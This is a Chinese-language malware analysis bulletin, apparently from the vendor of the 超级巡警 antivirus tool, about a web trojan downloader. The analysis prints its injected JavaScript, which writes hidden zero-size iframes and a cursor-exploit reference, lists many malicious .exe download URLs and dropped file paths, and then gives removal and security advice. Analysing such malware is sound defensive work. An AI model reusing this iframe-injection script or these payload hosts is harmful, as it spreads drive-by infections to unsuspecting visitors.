下载超级巡警http://www.skycn.com/soft/29107.html
一、病毒相关分析：
  
     病毒行为：
        1、通过调http://book.uubks.cn/bu/img.js下载其他恶意程序，其内容如下：
           document.writeln("<DIV style='CURSOR: urlhttp://book.uubks.cn/bu/ah.c)'></DIV>");
           document.writeln("<iframe width='0' height='0' src='http://book.uubks.cn/bu/img.htm'></iframe>");
           document.writeln("<iframe width='0' height='0' src='http://book.uubks.cn/bu/img1.htm'></iframe>");
           其中ah.c为利用光标漏洞传播的恶意程序
           下http://book.uubks.cn/bu/vip.exe ;          23,130 字节
           %CommonProgramFiles%\Microsoft Shared\MSInfo\System36.jup
           %CommonProgramFiles%\Microsoft Shared\MSInfo\System6.ins
           System6.ins插入进程explorer.exe
           下http://just.yule2007.com/ho123.txt并按照ho123.txt的内容下载其他程序
           //部份程序地址已经失效，或是作为预留的地址 
          http://just.yule2007.com/mh. exe 
          http://just.yule2007.com/wow. exe 
          http://just.yule2007.com/jh. exe 
          http://just.yule2007.com/qst. exe 
          http://just.yule2007.com/qj. exe 
          http://just.yule2007.com/my. exe 
          http://just.yule2007.com/zx. exe 
          http://just.yule2007.com/wd. exe 
          http://just.yule2007.com/wl. exe 
          http://just.yule2007.com/dh. exe 
          http://just.yule2007.com/tl. exe 
          http://just.yule2007.com/zt. exe 
          http://just.yule2007.com/hx. exe 
          http://just.yule2007.com/qqhx. exe 
          http://just.yule2007.com/mir. exe 
          http://just.yule2007.com/wmgj. exe 
          http://just.yule2007.com/hx. exe 
          http://just.yule2007.com/fy. exe 
          http://just.yule2007.com/sh. exe 
          http://just.yule2007.com/cs. exe 
          http://just.yule2007.com/tm1. exe 
          http://just.yule2007.com/tm2. exe 
          http://just.yule2007.com/tm3. exe 
          http://just.yule2007.com/tm4. exe 
          http://just.yule2007.com/tm5. exe 
          http://just.yule2007.com/guo. exe 
          http://just.yule2007.com/fyun. exe

        2、img.htm和img1.htm为用US-ASCII加密的网页，img1.htm解密后如下图：

通过下http://book.uubks.cn/bu/svcos.cab ;          21,065 字节
            加载为系统插件功能与vip.exe相同
        3、img.htm解密后为：


下http://book.uubks.cn/bu/svcos.exe ;           23,130 字节  //与svcos.cab中文件相同

二、解决方案
    推荐方案：
　    　  　  由于木马数量很多，手动查杀会很麻烦。
　    　  　  所以推荐安装超级巡警进行全面病毒查杀。超级巡警用户请升级到最新病毒库，并进行全盘扫描。
　    　  　  超级巡警下载地址http://www.skycn.com/soft/29107.html

三、安全建议
　　     1、立即安装或更新防病毒软件并对内存和硬盘全面扫描(推荐安装超级巡警)。
　　     2、根据实际安全级别需要适当考虑选用防火墙，并进行正确的设置。
　　     3、使用超级巡警的补丁检查功能，及时安装系统补丁。
　　     4、及时更新常用软件，尤其是聊天工具。
　　     5、不要随意下载不安全网站的文件并运行。
　　     6、不要随便登陆不明网站，特别不要随意登陆需要自己银行帐号或手机及计算机系统帐号的不明网站。建议使用超
　　     　　级巡警屏蔽恶意网站。
　　     7、下载和新拷贝的文件要首先进行查毒。
　　     8、使用移动存储介质进行数据访问时，先对其进行病毒检查，建议使用超级巡警U盘免疫器进行免疫。
　　     9、做好系统和重要数据的备份，以便能够进行系统和数据灾难恢复。

  注： %System% 是一个可变路径，在windows95/98/me中该变量是指%Windir%\System，在WindowsNT/2000/XP/2003/VISTA中该变
　　 量指%Windir%\System32。其它：
　　     %SystemDrive% 　　     　　 系统安装的磁盘分区
　　     %SystemRoot% = %Windir% 　　WINDODWS系统目录
　　     %ProgramFiles%　 　 　　　　应用程序默认安装目录
　　     %AppData% 　　     　　     应用程序数据目录
　　     %CommonProgramFiles%　　    公用文件目录
　　     %HomePath% 　　     　　    当前活动用户目录
　　     %Temp% =%Tmp% 　　     　　 当前活动用户临时目录
　　     %DriveLetter% 　　     　　 逻辑驱动器分区
　　     %HomeDrive% 　　　     　　 当前用户系统所在分区